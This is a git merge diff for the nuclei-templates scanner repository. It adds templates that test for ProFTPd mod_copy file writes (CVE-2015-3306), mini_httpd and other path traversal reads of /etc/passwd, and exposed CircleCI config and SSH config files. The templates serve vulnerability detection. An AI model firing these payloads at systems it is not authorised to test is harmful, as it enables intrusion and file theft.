Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates

2021-03-11 18:09:44 +02:00 · 2021-03-11 18:09:44 +02:00 · f343a4d311
parent d93ad3770a 6469f38cf4
commit f343a4d311
10 changed files with 109 additions and 4 deletions
--- a/README.md
+++ b/README.md
@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc

 | Templates      | Counts                         | Templates       | Counts                          | Templates        | Counts                         |
 | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
-| cves           | 235            | vulnerabilities | 105 | exposed-panels   | 104   |
-| exposures      | 61      | technologies    | 50      | misconfiguration | 54 |
+| cves           | 237            | vulnerabilities | 105 | exposed-panels   | 104   |
+| exposures      | 63      | technologies    | 50      | misconfiguration | 54 |
 | workflows      | 23        | miscellaneous   | 16     | default-logins   | 19 |
 | exposed-tokens | 9 | dns             | 6               | fuzzing          | 4          |
 | helpers        | 2        | takeovers       | 1         | -                | -                              |

-**75 directories, 712 files**.
+**75 directories, 716 files**.

 </td>
 </tr>
--- a/cves/2008/CVE-2008-2650.yaml
+++ b/cves/2008/CVE-2008-2650.yaml
@ -9,6 +9,7 @@ requests:
  - raw:
      - |
        GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1
+        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
--- a/cves/2015/CVE-2015-3306.yaml
+++ b/cves/2015/CVE-2015-3306.yaml
@ -0,0 +1,27 @@
+id: CVE-2015-3306
+
+info:
+  name: ProFTPd RCE
+  author: pd-team
+  severity: high
+  reference: https://github.com/t0kx/exploit-CVE-2015-3306
+  tags: cve,cve2015,ftp,rce,network
+
+network:
+  - inputs:
+      - data: "site cpfr /proc/self/cmdline\r\n"
+        read: 1024
+      - data: "site cpto /tmp/.{{randstr}}\r\n"
+        read: 1024
+      - data: "site cpfr /tmp/.{{randstr}}\r\n"
+        read: 1024
+      - data: "site cpto /var/www/html/{{randstr}}\r\n"
+    host:
+      - "{{Hostname}}:21"
+
+    read-size: 1024
+    matchers:
+      - type: word
+        words:
+          - "Copy successful"
+        part: raw
--- a/cves/2018/CVE-2018-18778.yaml
+++ b/cves/2018/CVE-2018-18778.yaml
@ -0,0 +1,24 @@
+id: CVE-2018-18778
+
+info:
+  name: mini_httpd Path Traversal
+  author: dhiyaneshDK
+  severity: high
+  reference: https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/
+  tags: cve,cve2018,lfi
+requests:
+  - raw:
+      - |+
+        GET /etc/passwd HTTP/1.1
+        Host: 
+        Content-Length: 4
+
+    unsafe: true
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: regex
+        regex:
+          - "root:[x*]:0:0:"
--- a/cves/2019/CVE-2019-11869.yaml
+++ b/cves/2019/CVE-2019-11869.yaml
@ -33,6 +33,7 @@ requests:
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Upgrade-Insecure-Requests: 1

+    req-condition: true
    matchers-condition: and
    matchers:
      - type: dsl
--- a/exposed-panels/identityguard-selfservice-entrust.yaml
+++ b/exposed-panels/identityguard-selfservice-entrust.yaml
@ -11,6 +11,7 @@ requests:
      - "{{BaseURL}}/IdentityGuardSelfService/"
      - "{{BaseURL}}/IdentityGuardSelfService/images/favicon.ico"

+    req-condition: true
    redirects: true
    max-redirects: 2
    matchers:
--- a/exposures/configs/circleci-config.yaml
+++ b/exposures/configs/circleci-config.yaml
@ -0,0 +1,24 @@
+id: circleci-config
+
+info:
+  name: circleci config.yml exposure
+  author: geeknik
+  severity: low
+  reference: https://circleci.com/docs/2.0/sample-config/
+
+requests:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/.circleci/config.yml"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'regex("^version: ", body) && contains(body, "jobs:") == true'
+
+      - type: status
+        status:
+          - 200
--- a/exposures/configs/circleci-ssh-config.yaml
+++ b/exposures/configs/circleci-ssh-config.yaml
@ -0,0 +1,26 @@
+id: circleci-ssh-config
+
+info:
+  name: circleci ssh-config exposure
+  author: geeknik
+  severity: low
+
+requests:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/.circleci/ssh-config"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Host"
+          - "HostName"
+          - "IdentityFile"
+        condition: and
+
+      - type: status
+        status:
+          - 200
--- a/fuzzing/iis-shortname.yaml
+++ b/fuzzing/iis-shortname.yaml
@ -46,8 +46,8 @@ requests:
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
        Accept-Language: en-US,en;q=0.9

+    req-condition: true
    matchers:
      - type: dsl
-        name: iis-scan
        dsl:
          - "status_code_1!=404 && status_code_2 == 404 || status_code_3 != 404 && status_code_4 == 404"
--- a/misconfiguration/put-method-enabled.yaml
+++ b/misconfiguration/put-method-enabled.yaml
@ -19,6 +19,7 @@ requests:
        GET /testing-put.txt HTTP/1.1
        Content-Type: text/plain

+    req-condition: true
    matchers:
      - type: dsl
        name: multi-req